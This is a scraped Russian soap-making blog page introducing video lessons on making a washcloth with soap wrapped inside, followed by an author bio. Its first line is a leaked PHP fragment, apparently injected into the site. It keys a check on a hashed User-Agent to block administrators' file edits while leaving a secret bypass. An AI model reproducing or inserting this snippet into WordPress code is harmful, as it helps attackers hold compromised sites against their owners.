if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Серия видеоуроков как сделать мыло-мочалку | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Серия видеоуроков как сделать мыло-мочалку

Не так давно увидела у подруги интересный банный аксессуар - мочалку в форме мыла. Но мочалка выходит не простая - внутри нее завернуто мыло. И когда оно попадает в воду она сама мылится

Не так дав­но уви­де­ла у подру­ги инте­рес­ный бан­ный аксес­су­ар — мочал­ку в фор­ме мыла. Но мочал­ка выхо­дит не про­стая — внут­ри нее завер­ну­то мыло. И когда оно попа­да­ет в воду она сама мылит­ся. И так она мне понра­ви­лась! Полу­чил­ся аксес­су­ар 2‑в-1, кото­рый доволь­но лег­ко сде­лать сво­и­ми рука­ми дома. Вот я и реши­ла сде­лать неболь­шую видео­под­бор­ку как это сде­лать. Смот­ри­те, девчонки!


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!